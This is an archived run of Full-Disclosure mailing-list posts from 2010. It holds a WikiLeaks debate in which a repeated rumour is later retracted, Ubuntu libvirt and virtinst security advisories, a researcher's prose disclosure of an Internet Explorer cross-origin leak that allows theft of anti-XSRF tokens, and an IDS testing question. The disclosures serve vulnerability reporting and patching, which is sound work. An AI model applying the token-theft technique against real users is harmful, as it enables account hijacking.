ha...@behrens.com wrote: Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry -- Cal Leeming Operational Security Support Team Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.uk Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk IM: AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 -- Cal Leeming Operational Security Support Team [SNIP] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
Hey Cal - hope all is well... Along those lines, I think it is also interesting to take into account how much similar information is being distributed by military personnel themselves on social sites like Facebook. Thomas Ryan did an interesting Blackhat presentation on Robin Sage where a fake account was friended by multiple military people, who in turn were posting iPhone and other geo-tagged images on facebook where their location was tagged and the associated names of others were available (I didn't actually get to attend, but I had prior knowledge of the content). So while this type of stuff is great Conspiracy Theory fodder, I seriously doubt that there is some illegal military operation behind the attacks on Wikileaks. If they had any additional information they wished to share, there are a million other ways of getting the data out there - we'd be seeing that stuff on Twitter instead of tech updates. I think we'd also be seeing Facebook takedowns as well... T P.S. I think I'm going to set up a social network for hookers and call it Twatter if anyone is interesting in investing. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Cal Leeming [Simplicity Media Ltd] Sent: Thursday, October 21, 2010 9:51 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] wikileaks still under attack, pressure revved up This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which could jeopardise the protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.commailto:ha...@behrens.com wrote: Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.ukmailto:supp...@simplicitymedialtd.co.uk Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk IM: AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 -- Cal Leeming Operational Security Support Team Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.ukmailto:supp...@simplicitymedialtd.co.uk Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk IM: AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
Am 21.10.2010 18:54, schrieb T Biehn: An entity that has the resources that would provoke such a hollywood esque tweet wouldn't have the ability to gag the twitter account before this release? would it, would it want to, has it missed it..who knows? Wouldn't that mean the tweet is a load of shit? Wouldn't/shouldn't/couldn't...I just don't know. Point is I'm trying to find out what's actually happening... -h ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
I believe that most of the times it is not what you defend but how you defend it. I believe in Government transparency but the way WL is going about it it's not right, in my honest opinion. So this is good news in my opinion... -r ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
I have seen nothing released that reveals sensitive information such as GPS co-ords + details of those who co-op'd with soldiers. This is a rumor. If you have proof that this is not a rumor, please post it. On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd] cal.leem...@simplicitymedialtd.co.uk wrote: This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which could jeopardise the protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote: Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
According to the secretary of defense, it's definitely a rumor: A letter from Secretary of Defense Robert M. Gates to Comittee of Armed Services Chairman Carl Levin dated August 16 but recently made available to the public says, The initial assessment in no way discounts the risk to national security; however, the review to date has not revealed any sensitive intelligence sources and methods compromised by this disclosure. http://mashable.com/2010/10/18/wikileaks-dod-intelligence/ direct pdf link: http://www.fas.org/sgp/othergov/dod/gates-wikileaks.pdf --Camden On 10/21/2010 11:49 AM, Ana Kismet wrote: I have seen nothing released that reveals sensitive information such as "GPS co-ords + details of those who co-op'd with soldiers." This is a rumor. If you have proof that this is not a rumor, please post it. On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd] cal.leem...@simplicitymedialtd.co.uk wrote: This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which couldjeopardisethe protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote: Sorry to all of those who think this is "gossiping", but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: "WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5." Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team Out of Hours:+44 (07534) 971120 |Support Tickets:supp...@simplicitymedialtd.co.uk Fax:+44 (02476) 578987|Email:cal.leem...@simplicitymedialtd.co.uk IM:AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number7143564 -- Cal Leeming Operational Security Support Team Out of Hours:+44 (07534) 971120 |Support Tickets:supp...@simplicitymedialtd.co.uk Fax:+44 (02476) 578987|Email:cal.leem...@simplicitymedialtd.co.uk IM:AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number7143564 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
I apologise for this, I had heard this in, what I had believed to be, a credible news report. On Thu, Oct 21, 2010 at 8:58 PM, Camden Buzard camde...@aptalaska.netwrote: According to the secretary of defense, it's definitely a rumor: A letter from Secretary of Defense Robert M. Gates to Comittee of Armed Services Chairman Carl Levin dated August 16 but recently made available to the public says, “The initial assessment in no way discounts the risk to national security; however, the review to date has not revealed any sensitive intelligence sources and methods compromised by this disclosure.” http://mashable.com/2010/10/18/wikileaks-dod-intelligence/ direct pdf link: http://www.fas.org/sgp/othergov/dod/gates-wikileaks.pdf --Camden On 10/21/2010 11:49 AM, Ana Kismet wrote: I have seen nothing released that reveals sensitive information such as GPS co-ords + details of those who co-op'd with soldiers. This is a rumor. If you have proof that this is not a rumor, please post it. On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd] cal.leem...@simplicitymedialtd.co.uk wrote: This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which could jeopardise the protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote: Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team *Out of Hours: *+44 (07534) 971120 | *Support Tickets: * supp...@simplicitymedialtd.co.uk *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk *IM: *AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
Agreed. I am all for the transparency, but WL is possibly putting our troops at risk by releasing military strategy. I wouldn't expect JA to think that there is any inclination of strategy in the documents they published, but there is a lot of strategy and a LOT of information that is now visible to more than just United States citizens. -timko -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Roger Sent: Thursday, October 21, 2010 12:51 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] wikileaks still under attack, pressure revved up I believe that most of the times it is not what you defend but how you defend it. I believe in Government transparency but the way WL is going about it it's not right, in my honest opinion. So this is good news in my opinion... -r ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
I am in the military, currently in Iraq, and these Wikileaks posts have hurt us more than people realize. It does two things, first, it demonstrates our tactics and procedures which allow insurgents to conduct more effective attacks against us, and second, the information it provides to insurgents endangers our sources and the families of sources that have provided us with valuable information. It also provides a means of giving insurgents propaganda to use against us. Whether you agree with the war or not, the publication of these documents hurts people who had no say in the decision to go to war. Having said that, I absolutely do not support the illegal attacks and denial of service to the site. Here is a link to a tech news article i read today on the issue. http://cybersecurityreport.nextgov.com/2010/10/wikileaks_communications_infrastructure_attacked.php?oref=latest_posts On Thu, Oct 21, 2010 at 12:49 PM, Ana Kismet anakis...@gmail.com wrote: I have seen nothing released that reveals sensitive information such as GPS co-ords + details of those who co-op'd with soldiers. This is a rumor. If you have proof that this is not a rumor, please post it. On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd] cal.leem...@simplicitymedialtd.co.uk wrote: This will be my first and last post on this topic (again). I've just finished watching some videos about what wikileaks have been doing. It appears that they released a bunch of documents that revealed information such as GPS co-ords + details of those who co-op'd with soldiers. He also posted the names of these people too, and a bunch of information which could jeopardise the protection of soldiers on the ground, from all countries. I can appreciate his previous efforts, but what he has done here is put many lifes at risk, both civilians and soldiers. So, if the US military have launched an all our war on Wikileaks, whether it be legal or not, I can't say it would be entirely shocking. On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote: Sorry to all of those who think this is gossiping, but: Wikileaks has been down for ca. 2 weeks now during which time the US has at least cut off their financial channels. This during a period where WL has announced another major leak release this time re. Iraq. What is also extremely disconcerting is the absolute silence of _all_ main street media to the topic (gag...?) Now the latest tweet reads: WikiLeaks communications infrastructure is currently under attack. Project BO move to coms channel S. Activate Reston5. Yet again I would like to pint out that there seems to be a concerted high power attack going on against WL And yet again I would like to point out it would be interesting to know what is rally happening. And yet again I'd like to emphasize that this indeed a security issue; it does concern netizens and citizens in general if major government organisations engage in what seems to be a dirty war against a whistleblowing organisation. If anybody knows more, pls. do share insights... Harry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Cal Leeming Operational Security Support Team Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.uk Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk IM: AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 -- Cal Leeming Operational Security Support Team Out of Hours: +44 (07534) 971120 | Support Tickets: supp...@simplicitymedialtd.co.uk Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk IM: AIM / ICQ / MSN / Skype (available upon request) Simplicity Media Ltd. All rights reserved. Registered company number 7143564 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wikileaks still under attack, pressure revved up
On Thu, Oct 21, 2010 at 11:32 AM, Charles Timko charles.ti...@hotmail.com wrote: Agreed. I am all for the transparency, but WL is possibly putting our troops at risk by releasing military strategy. I wouldn't expect JA to think that From: http://articles.cnn.com/2010-10-16/us/wikileaks.assessment_1_julian-assange-wikileaks-documents?_s=PM:US The online leak of thousands of secret military documents from the war in Afghanistan by the website WikiLeaks did not disclose any sensitive intelligence sources or methods, the Department of Defense concluded. So some are playing it up but the top dude at the Pentagon is playing it down. Who ya gonna believe? Unless someone can point to a verified leaked document online which says Mohammed Jihad Dirka Dirka who lives at lat/long told us Osama is in that house over there or some such I can't believe such information is being distributed. BMF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-1008-1] libvirt vulnerabilities
=== Ubuntu Security Notice USN-1008-1 October 21, 2010 libvirt vulnerabilities CVE-2010-2237, CVE-2010-2238, CVE-2010-2239, CVE-2010-2242 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libvirt-bin 0.4.0-2ubuntu8.3 libvirt00.4.0-2ubuntu8.3 Ubuntu 9.04: libvirt-bin 0.6.1-0ubuntu5.2 libvirt00.6.1-0ubuntu5.2 Ubuntu 9.10: libvirt-bin 0.7.0-1ubuntu13.2 libvirt00.7.0-1ubuntu13.2 Ubuntu 10.04 LTS: libvirt-bin 0.7.5-5ubuntu27.5 libvirt00.7.5-5ubuntu27.5 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: The previous version of libvirt on Ubuntu 10.04 LTS would probe a qemu disk to determine its format and did not require that the format be declared in the XML. This is considered a security problem in most deployments and this version of libvirt will default to the 'raw' format when the format is not specified in the XML. As a result, non-raw disks without a specified disk format will no longer be available in existing virtual machines. The libvirt-migrate-qemu-disks tool is provided to aid in transitioning virtual machine definitions to the new required format. In essence, it will check all domains for affected virtual machines, probe the affected disks and update the domain definition accordingly. This command will be run automatically on upgrade. For new virtual machines using non-raw images, the disk format must be specified in the domain XML provided to libvirt, otherwise the disk will not be available to the virtual machine. See man 1 libvirt-migrate-qemu-disks for details. Users who require the old behavior can adjust the 'allow_disk_format_probing' option in /etc/libvirt/qemu.conf. Details follow: It was discovered that libvirt would probe disk backing stores without consulting the defined format for the disk. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue only affected Ubuntu 10.04 LTS. By default, guests are confined by an AppArmor profile which provided partial protection against this flaw. (CVE-2010-2237, CVE-2010-2238) It was discovered that libvirt would create new VMs without setting a backing store format. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue did not affect Ubuntu 8.04 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile which provided partial protection against this flaw. (CVE-2010-2239) Jeremy Nickurak discovered that libvirt created iptables rules with too lenient mappings of source ports. A privileged attacker in the guest could bypass intended restrictions to access privileged resources on the host. (CVE-2010-2242) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.3.diff.gz Size/MD5:20884 e9ceff27938937bcc8b3c66e34fccf00 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.3.dsc Size/MD5: 1081 fd9d6eba4ca530254a86219ada9dc103 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0.orig.tar.gz Size/MD5: 2968326 2f6c6adb62145988f0e5021e5cbd71d3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-doc_0.4.0-2ubuntu8.3_all.deb Size/MD5: 316872 e3bfa8be390d762688ae9077ea77b89f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-bin_0.4.0-2ubuntu8.3_amd64.deb Size/MD5:88842 91996ea9642d9f43c11af7f178aac401 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.4.0-2ubuntu8.3_amd64.deb Size/MD5: 224782 0c81c813422856531052934cd2df82d3 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0-dbg_0.4.0-2ubuntu8.3_amd64.deb Size/MD5: 551124 0f010dc998ec103b16e13a6ed4d6dca6 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.4.0-2ubuntu8.3_amd64.deb Size/MD5: 181936 c214ad6ba917e19c39a950d4fd119d86 http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/python-libvirt_0.4.0-2ubuntu8.3_amd64.deb Size/MD5:26478 b362bda807c5a9b05203f00da3830b0f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-bin_0.4.0-2ubuntu8.3_i386.deb Size/MD5:87620
[Full-disclosure] [USN-1008-2] Virtinst update
=== Ubuntu Security Notice USN-1008-2 October 21, 2010 virtinst update https://launchpad.net/bugs/655392 === A security issue affects the following Ubuntu releases: Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 10.04 LTS: virtinst0.500.1-2ubuntu6.1 In general, a standard system update will make all the necessary changes. Details follow: Libvirt in Ubuntu 10.04 LTS now no longer probes qemu disks for the image format and defaults to 'raw' when the format is not specified in the XML. This change in behavior breaks virt-install --import because virtinst in Ubuntu 10.04 LTS did not allow for specifying a disk format and does not specify a format in the XML. This update adds the 'format=' option when specifying a disk. For example, to import an existing VM which uses a qcow2 disk format, use somthing like the following: virt-install --connect=qemu:///session --name test-import --ram=256 \ --disk path=path to qcow2 image,format=qcow2 --import For more information, see man 1 virt-install. Original advisory details: It was discovered that libvirt would probe disk backing stores without consulting the defined format for the disk. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue only affected Ubuntu 10.04 LTS. By default, guests are confined by an AppArmor profile which provided partial protection against this flaw. (CVE-2010-2237, CVE-2010-2238) It was discovered that libvirt would create new VMs without setting a backing store format. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue did not affect Ubuntu 8.04 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile which provided partial protection against this flaw. (CVE-2010-2239) Jeremy Nickurak discovered that libvirt created iptables rules with too lenient mappings of source ports. A privileged attacker in the guest could bypass intended restrictions to access privileged resources on the host. (CVE-2010-2242) Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1-2ubuntu6.1.diff.gz Size/MD5:11109 9e7424ceeab64e557fb589496aac69e9 http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1-2ubuntu6.1.dsc Size/MD5: 2155 58fffa8f010cd5d3c8b3a709da9e1311 http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1.orig.tar.gz Size/MD5: 428911 f87ccfe2b77823c9e06d32e8b6f20424 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/python-virtinst_0.500.1-2ubuntu6.1_all.deb Size/MD5: 1564 402d23ff10bc82ffaec3554c883399ea http://security.ubuntu.com/ubuntu/pool/main/v/virtinst/virtinst_0.500.1-2ubuntu6.1_all.deb Size/MD5: 230728 a958ec144ad1a7bdb3e4e1c25173fcdf signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Internet Explorer 8 PoC: window.onerror leak leads to surge in interest in goat farming?
Hi, Internet Explorer has a cross-origin leak through the window.onerror callback. At first glance, it's a minor leak but if you look around you can find a significant impact on some subset of websites. I wrote up more thorough details on how the attack works here: http://scarybeastsecurity.blogspot.com/2010/10/minor-leak-major-headache.html I also provided a PoC against Google Reader; the victim has their anti-XSRF token stolen and this is used to force them to subscribe to a feed on goat farming: http://scary.beasts.org/misc/reader.html (Unfortunately -- or fortunately depending upon you point of view -- the PoC is neutered because the Reader team elected to work around the IE vulnerability for now). The vulnerability remains unfixed in production versions of IE and is approaching 2 years old since vendor notification. This would make this a 600-day disclosure. It would be inaccurate to use the term 0-day, although misuse of that term is somewhat rampant. Security-conscious users may wish to prefer the Firefox browser over Internet Explorer; the timeline in the blog post shows two very different vendor responses to the exact same cross-origin leak. Cheers Chris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 10G virtual network traffic
Hello list. I’m making a virtual network which has 10G traffic for testing 10G IDS performance. I use a Breaking point device. http://www.breakingpointsystems.com/cyber- tomography-products/ Are there any tips or document about making 10G virtual network? And what point is important? How can I analysis without knowing real network traffic? What is the different things? 1G network traffic VS 10G network traffic smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
